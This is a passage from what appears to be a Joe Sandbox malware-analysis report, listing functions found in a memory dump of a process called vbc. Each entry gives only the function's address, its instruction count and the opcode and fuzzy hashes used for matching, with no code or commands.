                                                                                                                        • Instruction ID: 8cf1d5b54151f37f919a25aea36c282055d87090c4d4dd501b4956a63966800e
                                                                                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                        • Instruction Fuzzy Hash: 7C214B36B0066DA6CB26ABA48844EBEB7F4EF40710F40941AFDA5876D1E638DD50C7A0
                                                                                                                        Function 05364588 Relevance: .1, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                        • Instruction ID: 023c3e184c02561349e5a3f3f2de4710a16df07c8a9f25d45acefdd5222060bc
                                                                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                        • Instruction Fuzzy Hash: 9D216D32E00608ABCF15DF98C9C4A8ABBB5FF48714F10C469ED159B245D675EA458B90
                                                                                                                        Function 053644B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3d4c94df2c8ac4ecc4f7161215c03f564c413ab2afe46602a2e557c9cbe9491f
                                                                                                                        • Instruction ID: 301c573d6042d93d8fa7464faef5d9f0fb5b4040a2782b51e4a5de14dc27a5e8
                                                                                                                        • Opcode Fuzzy Hash: 3d4c94df2c8ac4ecc4f7161215c03f564c413ab2afe46602a2e557c9cbe9491f
                                                                                                                        • Instruction Fuzzy Hash: 3121C172A087459BCB21DF18C984F6B77E9FB88760F04891DFE559B244D7B0E900CBA2
                                                                                                                        Function 053AE609 Relevance: .1, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 92bd6d0db0926fa2839fb7a21c24b8b804cedf3a0150abe22aa4803c27a18ad0
                                                                                                                        • Instruction ID: b5a2b8e817826fa0621c3c8520d1c6b71d3de3c0e7c755a13f9345a13a0f79bb
                                                                                                                        • Opcode Fuzzy Hash: 92bd6d0db0926fa2839fb7a21c24b8b804cedf3a0150abe22aa4803c27a18ad0
                                                                                                                        • Instruction Fuzzy Hash: 3331B476610215EFCB14CF58C484DEEB7BAFFC4304B114859E8099B3A0EB71EA50CB90
                                                                                                                        Function 0532E388 Relevance: .1, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                        • Instruction ID: 800a083931f82f4253772528c55720088c51abdd243f60337018b8315c419537
                                                                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                        • Instruction Fuzzy Hash: BD31AB31600A14EFDB25DFA8C885F6AB7F9FF45354F1049A9E5128B690E770EE01CB50
                                                                                                                        Function 05338D59 Relevance: .1, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                                        • Instruction ID: 906b8c334009c2472e158edfebea4b68056a3682091b41040f570625da0320ae
                                                                                                                        • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                                        • Instruction Fuzzy Hash: 0E2136F9705A40ABEB29D729C909B77B7DABF41750F0904A0FD028BAD1E3A49C418610
                                                                                                                        Function 053B06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7b018a981fc4664a0225b3748753b7ea91d5376cffd9155132bb5809bf49e482
                                                                                                                        • Instruction ID: 507818549fb608ed7703eacf0e68e89c4723aef0e8530a057106a4d3a2be74fe
                                                                                                                        • Opcode Fuzzy Hash: 7b018a981fc4664a0225b3748753b7ea91d5376cffd9155132bb5809bf49e482
                                                                                                                        • Instruction Fuzzy Hash: 62217E71A106299BDF24DF69C885AFEB7F4FF48740B500069E941EB240D778AD41CBA0
                                                                                                                        Function 053B019F Relevance: .1, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8af8adeb758e8606aabee7fc0d6225f4af24128a66da6fb1a8bce151e7a82e0d
                                                                                                                        • Instruction ID: 269ad50591017094f1d4edc613a06b7697385b85a89d95ccfabffcb53485d7d9
                                                                                                                        • Opcode Fuzzy Hash: 8af8adeb758e8606aabee7fc0d6225f4af24128a66da6fb1a8bce151e7a82e0d
                                                                                                                        • Instruction Fuzzy Hash: 2621A171600644AFDB19DB68C848FAAB7F8FF48740F140069F905DBB90D674ED40CB54
                                                                                                                        Function 053B0283 Relevance: .1, Instructions: 74COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bcaa9619996d6e16325d30de912c4a379e71808871b44008245255eeb2e4be16
                                                                                                                        • Instruction ID: 00f9884705b064dc00c7205a0261a642478abc855bc62f1302a45827576a9d5e
                                                                                                                        • Opcode Fuzzy Hash: bcaa9619996d6e16325d30de912c4a379e71808871b44008245255eeb2e4be16
                                                                                                                        • Instruction Fuzzy Hash: B821F5726083459FE715DFA9C84CF9BB7DCBF81240F080956BE84CBA51D7B0E948C6A1
                                                                                                                        Function 05336C50 Relevance: .1, Instructions: 73COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                                                                        • Instruction ID: 74ab7f4d0838cf950352ac3b8540164f43334860abacaf184bb417f0313525eb
                                                                                                                        • Opcode Fuzzy Hash: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                                                                        • Instruction Fuzzy Hash: 7B3188B5604601CFCB24CF58C181B26BBF9FB48714F2484ADE94A8B752DB71ED42CB90
                                                                                                                        Function 053EA49A Relevance: .1, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 95233f3262eed3d139689c7cd7bdd931fed29230e0b8e64478e63ac4deb6e9f8
                                                                                                                        • Instruction ID: 97f3779f1f97c6ce4cb5d6ea303057893a7760cf27cd64092798268cd62146fb
                                                                                                                        • Opcode Fuzzy Hash: 95233f3262eed3d139689c7cd7bdd931fed29230e0b8e64478e63ac4deb6e9f8
                                                                                                                        • Instruction Fuzzy Hash: DD112972380B20BFE72256549C19F67B6DEDBC4B60F110424B758DB2C4EEB0EC028795
                                                                                                                        Function 0536A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8d70c8598a9aff633de93b3bd884e7409efdf59ae87f84b2202ebea573e25476
                                                                                                                        • Instruction ID: 25c170837284724dc9d1e4b2cb7804e2cfe4f12fec478e8315e8ce81955df1ac
                                                                                                                        • Opcode Fuzzy Hash: 8d70c8598a9aff633de93b3bd884e7409efdf59ae87f84b2202ebea573e25476
                                                                                                                        • Instruction Fuzzy Hash: 3E216835601A10DBCB25DF69C901B56B7F6EF48B04F24846CA509DBB61E731E842CF94
                                                                                                                        Function 053C80A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                        • Instruction ID: 0a4746187de9a93e9db97f4edea82047901b0413c0bd832cb89a23a71db65cfc
                                                                                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                        • Instruction Fuzzy Hash: 4E216A72A00209AFDB129F94CC44FAEBBFAEF88310F204899F901A7250D774DE508B50
                                                                                                                        Function 05338770 Relevance: .1, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 26e4794305f9a37a56c2e90767a2c1dad810f6e94f17e27f8785824f320f0775
                                                                                                                        • Instruction ID: 5e9d5fe9c4bb7bdc9ba96c576776e9754b0be815d6ac9937b5cd5ee6e4f925fa
                                                                                                                        • Opcode Fuzzy Hash: 26e4794305f9a37a56c2e90767a2c1dad810f6e94f17e27f8785824f320f0775
                                                                                                                        • Instruction Fuzzy Hash: F011BF31702620DBCB11CF59C481A66FBEABF4A750B198069FD09EF204D6F2E9018790
                                                                                                                        Function 05360124 Relevance: .1, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                        • Instruction ID: ad7b0c49ccbefe8f55bfc02365095cd98bdfe0ba7ba1b9f877726f578a0460cb
                                                                                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                        • Instruction Fuzzy Hash: 30110477A00604BFD7269F44CC4AFAABBB9EB81754F10802DF6008F180D675ED44CB60
                                                                                                                        Function 053D4F42 Relevance: .1, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                                                        • Instruction ID: 17efdee82e6bdfa2472721a4f8910d84312c322fd375ebee56d91c55bde64f5a
                                                                                                                        • Opcode Fuzzy Hash: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                                                        • Instruction Fuzzy Hash: 66213076E00219AFCB15CF99D880DAEFBB9FF58344B5140A9E405A7351DA719E41CBB0
                                                                                                                        Function 053380E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3a39052a4005a239e7da4a39b71237fe022977e907b7804e91f48279fe9d0c8a
                                                                                                                        • Instruction ID: c2d70819716f1640e124578bd47ace7aaa1c7e9b4d7db1b689269949effd74a3
                                                                                                                        • Opcode Fuzzy Hash: 3a39052a4005a239e7da4a39b71237fe022977e907b7804e91f48279fe9d0c8a
                                                                                                                        • Instruction Fuzzy Hash: 9B215B75A01205DFCB14CF98C582AAEFBB6FB88318F24416DE505AB310CB71AD46CBD0
                                                                                                                        Function 0536674D Relevance: .1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8ec99f5a6eeae8f21da4a0865643f601ae46b8eebb838cae4c3792f522b9c2c2
                                                                                                                        • Instruction ID: 4aeb5151567e7a3d8631cd4b72944543fa04204bf00e36b9c0fb59152e996e1e
                                                                                                                        • Opcode Fuzzy Hash: 8ec99f5a6eeae8f21da4a0865643f601ae46b8eebb838cae4c3792f522b9c2c2
                                                                                                                        • Instruction Fuzzy Hash: 6F214D75614A00EFC721DF68C882F66B7E9FB44290F50882DE49AC7650DAB1BC50CB61
                                                                                                                        Function 053666B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 39dc606310e1cfb3118983e191eccd4090b8b4b58241901676a2cccb874e5719
                                                                                                                        • Instruction ID: 3170b5aa2272cdae34fe8cf67d08637d1a2698ddcab758ad3230d5a480d58167
                                                                                                                        • Opcode Fuzzy Hash: 39dc606310e1cfb3118983e191eccd4090b8b4b58241901676a2cccb874e5719
                                                                                                                        • Instruction Fuzzy Hash: DA11C176A01254DFCB24CF59D581E5AFBEAEF84690F06807DE806EB314DA70DD00CB94
                                                                                                                        Function 05332F12 Relevance: .1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bbe6defd6fd981f88799dcf4219f559f2950edafee4aaaacee774db21dc9ef22
                                                                                                                        • Instruction ID: e12a9ff05e64ab4545de300f82269307a1a16b831376beaa6e9cdbbe71998a88
                                                                                                                        • Opcode Fuzzy Hash: bbe6defd6fd981f88799dcf4219f559f2950edafee4aaaacee774db21dc9ef22
                                                                                                                        • Instruction Fuzzy Hash: 0811E5393043206BD735A769AC87FA7E7D9EB94A60FA50026F60597294DDF0E800C6B5
                                                                                                                        Function 053BE7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                        • Instruction ID: 1f62ef3985b2b8d615ba64fe4525d6f6469c07de0be2eaff2dc9e0cb4a404d4a
                                                                                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                        • Instruction Fuzzy Hash: 6F119132A04A04EFE7229F49C844BD677EAFB45B50F058428EA19DB560DBF1DC40EB90
                                                                                                                        Function 053527ED Relevance: .1, Instructions: 58COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a60a6f60b82ef89ead20a2e17bfe99eac9ea70fe689deb3e20cb992c1800880d
                                                                                                                        • Instruction ID: 2586a4578856024b633038ceffe9ec4b9090411be6d04d9192c7a5f63cd3c1ed
                                                                                                                        • Opcode Fuzzy Hash: a60a6f60b82ef89ead20a2e17bfe99eac9ea70fe689deb3e20cb992c1800880d
                                                                                                                        • Instruction Fuzzy Hash: 94012675709644ABE31BA2A9D858F67679DEF81364F090075FC018B640D9A4DC00C2A1
                                                                                                                        Function 05334690 Relevance: .1, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2140f249883cdb509d0e26503faef2f6b492b744485ad0ec5e973f36e55188c6
                                                                                                                        • Instruction ID: b7a877a76a6703ee51f1121ad3f123a825007c2c147599690b44b76a495438fa
                                                                                                                        • Opcode Fuzzy Hash: 2140f249883cdb509d0e26503faef2f6b492b744485ad0ec5e973f36e55188c6
                                                                                                                        • Instruction Fuzzy Hash: 6211AC36204644AFCF25CF59D84AF567BA9FB86B64F00412AF825CB690C7B4E840CFA0
                                                                                                                        Function 05366620 Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 04f3aa043d03f70ad1d4286ad0cf1727910ab4c11bcb538e77e59a5daeb0e80f
                                                                                                                        • Instruction ID: e83a7a93cdf7766f66188d85ecc135a2aa0f9ea72862fb707c3ca858ac7109eb
                                                                                                                        • Opcode Fuzzy Hash: 04f3aa043d03f70ad1d4286ad0cf1727910ab4c11bcb538e77e59a5daeb0e80f
                                                                                                                        • Instruction Fuzzy Hash: 9011E572A00715ABCB21EF59EDC6B9EF7B8FF84790F504459D905A7204DB70BD018B90
                                                                                                                        Function 0535E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                        • Instruction ID: 33c186ca00f649a9c0b37815030bfa8ce50e2e8c56828825aa8eebfe7e207d81
                                                                                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                        • Instruction Fuzzy Hash: C011E5B23096C69BDB279728C948F2537D9BB01754F1918E0DD41C7A41F378D942DA51
                                                                                                                        Function 053BE75D Relevance: .1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                        • Instruction ID: 48e87b467bf39964c7f2b4d724aa6512705f58c39dbd65aaaf0c7a911ce61faf
                                                                                                                        • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                        • Instruction Fuzzy Hash: 3201C032704114AFE7219F58C806FDA7BAEFB40750F058024EA06DBA60E7F5DD40EB90
                                                                                                                        Function 0532A250 Relevance: .1, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                        • Instruction ID: ec9128bad967665f7405c94ac1889a4988098d717cc70a72f77bb5c6c9d252d4
                                                                                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                        • Instruction Fuzzy Hash: FB01D671505B259BCB308F15D840A767BEAFF45760701892DFC958B680D776D440CF60
                                                                                                                        Function 053AE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 286918571f0367fda38dddfaa24a7ac4726342fad11dd81586d4573c5230ace9
                                                                                                                        • Instruction ID: 3b565ede8ce6179a2f5d6a4bf711968c06bb9a80e6370b402a2a79c542166bb0
                                                                                                                        • Opcode Fuzzy Hash: 286918571f0367fda38dddfaa24a7ac4726342fad11dd81586d4573c5230ace9
                                                                                                                        • Instruction Fuzzy Hash: 2611AD32641240EFCB26EF18CD95F56BBB8FF48B54F200065F9059B6A1D635ED01DAA0
                                                                                                                        Function 05336259 Relevance: .1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c8ea42eaa59de601decbb926c5f09e6e8ee7f59a4d1effddfb781a3e023f6787
                                                                                                                        • Instruction ID: cc131adf1999ee15f11b9e700a33c348a5135e48ac07c11294a6fa3db6855ef1
                                                                                                                        • Opcode Fuzzy Hash: c8ea42eaa59de601decbb926c5f09e6e8ee7f59a4d1effddfb781a3e023f6787
                                                                                                                        • Instruction Fuzzy Hash: 82114870A4122CABDB39AB64CC46FE9B2B4FB04710F504194A319A60E0DB709E81CF84
                                                                                                                        Function 05366DA0 Relevance: .1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                                        • Instruction ID: 6690dd1f1ceee54ccb021933cadedbf6f9a50706c1916240581ea6e6297790fb
